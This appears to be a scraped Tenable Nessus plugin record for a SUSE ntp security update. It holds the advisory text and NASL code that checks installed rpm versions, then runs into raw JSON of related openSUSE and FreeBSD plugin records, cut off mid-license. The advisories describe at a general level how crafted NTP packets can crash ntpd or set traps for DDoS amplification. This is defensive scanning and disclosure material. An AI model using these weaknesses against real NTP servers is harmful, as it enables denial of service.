ID: SUSE_SU-2016-3196-1.NASL
Type: nessus
Reporter: This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.
Modified: 2016-12-21T00:00:00
Description
This update for ntp fixes the following issues: ntp was updated to 4.2.8p9.

Security issues fixed:
- CVE-2016-9311, CVE-2016-9310, bsc#1011377: Mode 6 unauthenticated trap information disclosure and DDoS vector.
- CVE-2015-5219: An endless loop due to incorrect precision to double conversion (bsc#943216).

Non-security issues fixed:
- Fix a spurious error message.
- Other bugfixes, see /usr/share/doc/packages/ntp/ChangeLog.
- Fix a regression in 'trap' (bsc#981252).
- Reduce the number of netlink groups to listen on for changes to the local network setup (bsc#992606).
- Fix segfault in 'sntp -a' (bsc#1009434).
- Silence an OpenSSL version warning (bsc#992038).
- Make the resolver task change user and group IDs to the same values as the main task. (bsc#988028)
- Simplify ntpd's search for its own executable to prevent AppArmor warnings (bsc#956365).

Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from SUSE update advisory SUSE-SU-2016:3196-1.
# The text itself is copyright (C) SUSE.
#
include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(95988);
  script_version("3.14");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/06");

  script_cve_id("CVE-2015-5219", "CVE-2016-7426", "CVE-2016-7427", "CVE-2016-7428", "CVE-2016-7429", "CVE-2016-7431", "CVE-2016-7433", "CVE-2016-7434", "CVE-2016-9310", "CVE-2016-9311");

  script_name(english:"SUSE SLES12 Security Update : ntp (SUSE-SU-2016:3196-1)");
  script_summary(english:"Checks rpm output for the updated packages.");

  script_set_attribute(
    attribute:"synopsis",
    value:"The remote SUSE host is missing one or more security updates."
  );
  script_set_attribute(
    attribute:"description",
    value:
"This update for ntp fixes the following issues: ntp was updated to
4.2.8p9. Security issues fixed :
- CVE-2016-9311, CVE-2016-9310, bsc#1011377: Mode 6
unauthenticated trap information disclosure and DDoS
vector.
- CVE-2016-7427, bsc#1011390: Broadcast Mode Replay
Prevention DoS.
- CVE-2016-7428, bsc#1011417: Broadcast Mode Poll Interval
Enforcement DoS.
- CVE-2016-7431, bsc#1011395: Regression: 010-origin: Zero
Origin Timestamp Bypass.
- CVE-2016-7434, bsc#1011398: NULL pointer dereference in
_IO_str_init_static_internal().
- CVE-2016-7429, bsc#1011404: Interface selection attack.
- CVE-2016-7426, bsc#1011406: Client rate limiting and
server responses.
- CVE-2016-7433, bsc#1011411: Reboot sync calculation
problem.
- CVE-2015-5219: An endless loop due to incorrect
precision to double conversion (bsc#943216).
Non-security issues fixed :
- Fix a spurious error message.
- Other bugfixes, see
/usr/share/doc/packages/ntp/ChangeLog.
- Fix a regression in 'trap' (bsc#981252).
- Reduce the number of netlink groups to listen on for
changes to the local network setup (bsc#992606).
- Fix segfault in 'sntp -a' (bsc#1009434).
- Silence an OpenSSL version warning (bsc#992038).
- Make the resolver task change user and group IDs to the
same values as the main task. (bsc#988028)
- Simplify ntpd's search for its own executable to prevent
AppArmor warnings (bsc#956365).
Note that Tenable Network Security has extracted the preceding
description block directly from the SUSE security advisory. Tenable
has attempted to automatically clean and format it as much as possible
without introducing additional issues."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=1009434"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=1011377"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=1011390"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=1011395"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=1011398"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=1011404"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=1011406"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=1011411"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=1011417"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=943216"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=956365"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=981252"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=988028"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=992038"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://bugzilla.suse.com/show_bug.cgi?id=992606"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.suse.com/security/cve/CVE-2015-5219/"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.suse.com/security/cve/CVE-2016-7426/"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.suse.com/security/cve/CVE-2016-7427/"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.suse.com/security/cve/CVE-2016-7428/"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.suse.com/security/cve/CVE-2016-7429/"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.suse.com/security/cve/CVE-2016-7431/"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.suse.com/security/cve/CVE-2016-7433/"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.suse.com/security/cve/CVE-2016-7434/"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.suse.com/security/cve/CVE-2016-9310/"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.suse.com/security/cve/CVE-2016-9311/"
  );
  # https://www.suse.com/support/update/announcement/2016/suse-su-20163196-1/
  script_set_attribute(
    attribute:"see_also",
    value:"http://www.nessus.org/u?1613e866"
  );
  script_set_attribute(
    attribute:"solution",
    value:
"To install this SUSE Security Update use YaST online_update.
Alternatively you can run the command listed for your product :
SUSE Linux Enterprise Server for SAP 12:zypper in -t patch
SUSE-SLE-SAP-12-2016-1852=1
SUSE Linux Enterprise Server 12-LTSS:zypper in -t patch
SUSE-SLE-SERVER-12-2016-1852=1
To bring your system up-to-date, use 'zypper patch'."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:ntp");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:ntp-debuginfo");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:ntp-debugsource");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:ntp-doc");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:suse_linux:12");

  script_set_attribute(attribute:"vuln_publication_date", value:"2017/01/13");
  script_set_attribute(attribute:"patch_publication_date", value:"2016/12/19");
  script_set_attribute(attribute:"plugin_publication_date", value:"2016/12/21");
  script_set_attribute(attribute:"generated_plugin", value:"current");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"SuSE Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/SuSE/release", "Host/SuSE/rpm-list");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("rpm.inc");

if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/SuSE/release");
if (isnull(release) || release !~ "^(SLED|SLES)") audit(AUDIT_OS_NOT, "SUSE");
os_ver = pregmatch(pattern: "^(SLE(S|D)\d+)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "SUSE");
os_ver = os_ver[1];
if (! preg(pattern:"^(SLES12)$", string:os_ver)) audit(AUDIT_OS_NOT, "SUSE SLES12", "SUSE " + os_ver);

if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if (cpu !~ "^i[3-6]86$" && "x86_64" >!< cpu && "s390x" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "SUSE " + os_ver, cpu);

sp = get_kb_item("Host/SuSE/patchlevel");
if (isnull(sp)) sp = "0";
if (os_ver == "SLES12" && (! preg(pattern:"^(0)$", string:sp))) audit(AUDIT_OS_NOT, "SLES12 SP0", os_ver + " SP" + sp);

flag = 0;
if (rpm_check(release:"SLES12", sp:"0", reference:"ntp-4.2.8p9-46.18.1")) flag++;
if (rpm_check(release:"SLES12", sp:"0", reference:"ntp-debuginfo-4.2.8p9-46.18.1")) flag++;
if (rpm_check(release:"SLES12", sp:"0", reference:"ntp-debugsource-4.2.8p9-46.18.1")) flag++;
if (rpm_check(release:"SLES12", sp:"0", reference:"ntp-doc-4.2.8p9-46.18.1")) flag++;

if (flag)
{
  if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());
  else security_hole(0);
  exit(0);
}
else
{
  tested = pkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "ntp");
}
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1|2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1/2\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! 
preg(pattern:\"^(1|2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP1/2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"ntp-4.2.8p9-55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"ntp-debuginfo-4.2.8p9-55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"ntp-debugsource-4.2.8p9-55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"ntp-doc-4.2.8p9-55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"ntp-4.2.8p9-55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"ntp-debuginfo-4.2.8p9-55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"ntp-debugsource-4.2.8p9-55.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"x86_64\", reference:\"ntp-doc-4.2.8p9-55.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"ntp-4.2.8p9-55.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"ntp-debuginfo-4.2.8p9-55.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"ntp-debugsource-4.2.8p9-55.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"ntp-doc-4.2.8p9-55.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"ntp-4.2.8p9-55.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"ntp-debuginfo-4.2.8p9-55.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"ntp-debugsource-4.2.8p9-55.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"ntp-doc-4.2.8p9-55.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) 
audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp\");\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-20T12:29:52", "description": "This update for ntp fixes the following issues :\n\nntp was updated to 4.2.8p9.\n\nSecurity issues fixed :\n\n - CVE-2016-9311, CVE-2016-9310, bsc#1011377: Mode 6\n unauthenticated trap information disclosure and DDoS\n vector.\n\n - CVE-2016-7427, bsc#1011390: Broadcast Mode Replay\n Prevention DoS.\n\n - CVE-2016-7428, bsc#1011417: Broadcast Mode Poll Interval\n Enforcement DoS.\n\n - CVE-2016-7431, bsc#1011395: Regression: 010-origin: Zero\n Origin Timestamp Bypass.\n\n - CVE-2016-7434, bsc#1011398: NULL pointer dereference in\n _IO_str_init_static_internal().\n\n - CVE-2016-7429, bsc#1011404: Interface selection attack.\n\n - CVE-2016-7426, bsc#1011406: Client rate limiting and\n server responses.\n\n - CVE-2016-7433, bsc#1011411: Reboot sync calculation\n problem.\n\n - CVE-2015-5219: An endless loop due to incorrect\n precision to double conversion (bsc#943216).\n\nNon-security issues fixed :\n\n - Fix a spurious error message.\n\n - Other bugfixes, see\n /usr/share/doc/packages/ntp/ChangeLog.\n\n - Fix a regression in 'trap' (bsc#981252).\n\n - Reduce the number of netlink groups to listen on for\n changes to the local network setup (bsc#992606).\n\n - Fix segfault in 'sntp -a' (bsc#1009434).\n\n - Silence an OpenSSL version warning (bsc#992038).\n\n - Make the resolver task change user and group IDs to the\n same values as the main task. 
(bsc#988028)\n\n - Simplify ntpd's search for its own executable to prevent\n AppArmor warnings (bsc#956365).\n\nThis update was imported from the SUSE:SLE-12-SP1:Update update\nproject.", "edition": 28, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-12-29T00:00:00", "title": "openSUSE Security Update : ntp (openSUSE-2016-1525)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7434", "CVE-2016-9311", "CVE-2015-5219", "CVE-2016-7433", "CVE-2016-7427", "CVE-2016-7429", "CVE-2016-7428", "CVE-2016-9310", "CVE-2016-7426", "CVE-2016-7431"], "modified": "2016-12-29T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:ntp-debuginfo", "cpe:/o:novell:opensuse:42.1", "p-cpe:/a:novell:opensuse:ntp-debugsource", "cpe:/o:novell:opensuse:42.2", "p-cpe:/a:novell:opensuse:ntp"], "id": "OPENSUSE-2016-1525.NASL", "href": "https://www.tenable.com/plugins/nessus/96173", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-1525.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(96173);\n script_version(\"3.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-5219\", \"CVE-2016-7426\", \"CVE-2016-7427\", \"CVE-2016-7428\", \"CVE-2016-7429\", \"CVE-2016-7431\", \"CVE-2016-7433\", \"CVE-2016-7434\", \"CVE-2016-9310\", \"CVE-2016-9311\");\n\n script_name(english:\"openSUSE Security Update : ntp (openSUSE-2016-1525)\");\n script_summary(english:\"Check for the openSUSE-2016-1525 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for ntp fixes the 
following issues :\n\nntp was updated to 4.2.8p9.\n\nSecurity issues fixed :\n\n - CVE-2016-9311, CVE-2016-9310, bsc#1011377: Mode 6\n unauthenticated trap information disclosure and DDoS\n vector.\n\n - CVE-2016-7427, bsc#1011390: Broadcast Mode Replay\n Prevention DoS.\n\n - CVE-2016-7428, bsc#1011417: Broadcast Mode Poll Interval\n Enforcement DoS.\n\n - CVE-2016-7431, bsc#1011395: Regression: 010-origin: Zero\n Origin Timestamp Bypass.\n\n - CVE-2016-7434, bsc#1011398: NULL pointer dereference in\n _IO_str_init_static_internal().\n\n - CVE-2016-7429, bsc#1011404: Interface selection attack.\n\n - CVE-2016-7426, bsc#1011406: Client rate limiting and\n server responses.\n\n - CVE-2016-7433, bsc#1011411: Reboot sync calculation\n problem.\n\n - CVE-2015-5219: An endless loop due to incorrect\n precision to double conversion (bsc#943216).\n\nNon-security issues fixed :\n\n - Fix a spurious error message.\n\n - Other bugfixes, see\n /usr/share/doc/packages/ntp/ChangeLog.\n\n - Fix a regression in 'trap' (bsc#981252).\n\n - Reduce the number of netlink groups to listen on for\n changes to the local network setup (bsc#992606).\n\n - Fix segfault in 'sntp -a' (bsc#1009434).\n\n - Silence an OpenSSL version warning (bsc#992038).\n\n - Make the resolver task change user and group IDs to the\n same values as the main task. 
(bsc#988028)\n\n - Simplify ntpd's search for its own executable to prevent\n AppArmor warnings (bsc#956365).\n\nThis update was imported from the SUSE:SLE-12-SP1:Update update\nproject.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1009434\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1011377\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1011390\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1011395\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1011398\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1011404\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1011406\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1011411\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1011417\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=943216\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=956365\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=981252\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=988028\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=992038\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=992606\"\n 
);\n script_set_attribute(attribute:\"solution\", value:\"Update the affected ntp packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ntp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ntp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ntp-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.1|SUSE42\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.1 / 42.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ntp-4.2.8p9-27.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ntp-debuginfo-4.2.8p9-27.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ntp-debugsource-4.2.8p9-27.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ntp-4.2.8p9-27.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ntp-debuginfo-4.2.8p9-27.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ntp-debugsource-4.2.8p9-27.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntp / ntp-debuginfo / ntp-debugsource\");\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-06T10:59:57", "description": "Multiple vulnerabilities have been discovered in the NTP suite 
:\n\nCVE-2016-9311: Trap crash, Reported by Matthew Van Gundy of Cisco\nASIG.\n\nCVE-2016-9310: Mode 6 unauthenticated trap information disclosure and\nDDoS vector. Reported by Matthew Van Gundy of Cisco ASIG.\n\nCVE-2016-7427: Broadcast Mode Replay Prevention DoS. Reported by\nMatthew Van Gundy of Cisco ASIG.\n\nCVE-2016-7428: Broadcast Mode Poll Interval Enforcement DoS. Reported\nby Matthew Van Gundy of Cisco ASIG.\n\nCVE-2016-7431: Regression: 010-origin: Zero Origin Timestamp Bypass.\nReported by Sharon Goldberg and Aanchal Malhotra of Boston University.\n\nCVE-2016-7434: NULL pointer dereference in\n_IO_str_init_static_internal(). Reported by Magnus Stubman.\n\nCVE-2016-7426: Client rate limiting and server responses. Reported by\nMiroslav Lichvar of Red Hat.\n\nCVE-2016-7433: Reboot sync calculation problem. Reported independently\nby Brian Utterback of Oracle, and by Sharon Goldberg and Aanchal\nMalhotra of Boston University. Impact : A remote attacker who can send\na specially crafted packet to cause a NULL pointer dereference that\nwill crash ntpd, resulting in a Denial of Service. [CVE-2016-9311]\n\nAn exploitable configuration modification vulnerability exists in the\ncontrol mode (mode 6) functionality of ntpd. If, against long-standing\nBCP recommendations, 'restrict default noquery ...' 
is not specified,\na specially crafted control mode packet can set ntpd traps, providing\ninformation disclosure and DDoS amplification, and unset ntpd traps,\ndisabling legitimate monitoring by an attacker from remote.\n[CVE-2016-9310]\n\nAn attacker with access to the NTP broadcast domain can periodically\ninject specially crafted broadcast mode NTP packets into the broadcast\ndomain which, while being logged by ntpd, can cause ntpd to reject\nbroadcast mode packets from legitimate NTP broadcast servers.\n[CVE-2016-7427]\n\nAn attacker with access to the NTP broadcast domain can send specially\ncrafted broadcast mode NTP packets to the broadcast domain which,\nwhile being logged by ntpd, will cause ntpd to reject broadcast mode\npackets from legitimate NTP broadcast servers. [CVE-2016-7428]\n\nOrigin timestamp problems were fixed in ntp 4.2.8p6. However,\nsubsequent timestamp validation checks introduced a regression in the\nhandling of some Zero origin timestamp checks. [CVE-2016-7431]\n\nIf ntpd is configured to allow mrulist query requests from a server\nthat sends a crafted malicious packet, ntpd will crash on receipt of\nthat crafted malicious mrulist query packet. [CVE-2016-7434]\n\nAn attacker who knows the sources (e.g., from an IPv4 refid in server\nresponse) and knows the system is (mis)configured in this way can\nperiodically send packets with spoofed source address to keep the rate\nlimiting activated and prevent ntpd from accepting valid responses\nfrom its sources. [CVE-2016-7426]\n\nNtp Bug 2085 described a condition where the root delay was included\ntwice, causing the jitter value to be higher than expected. Due to a\nmisinterpretation of a small-print variable in The Book, the fix for\nthis problem was incorrect, resulting in a root distance that did not\ninclude the peer dispersion. 
The calculations and formulas have been\nreviewed and reconciled, and the code has been updated accordingly.\n[CVE-2016-7433]", "edition": 35, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-12-27T00:00:00", "title": "FreeBSD : FreeBSD -- Multiple vulnerabilities of ntp (fcedcdbb-c86e-11e6-b1cf-14dae9d210b8)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7434", "CVE-2016-9311", "CVE-2016-7433", "CVE-2016-7427", "CVE-2016-7428", "CVE-2016-9310", "CVE-2016-7426", "CVE-2016-7431"], "modified": "2016-12-27T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:FreeBSD"], "id": "FREEBSD_PKG_FCEDCDBBC86E11E6B1CF14DAE9D210B8.NASL", "href": "https://www.tenable.com/plugins/nessus/96123", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. 
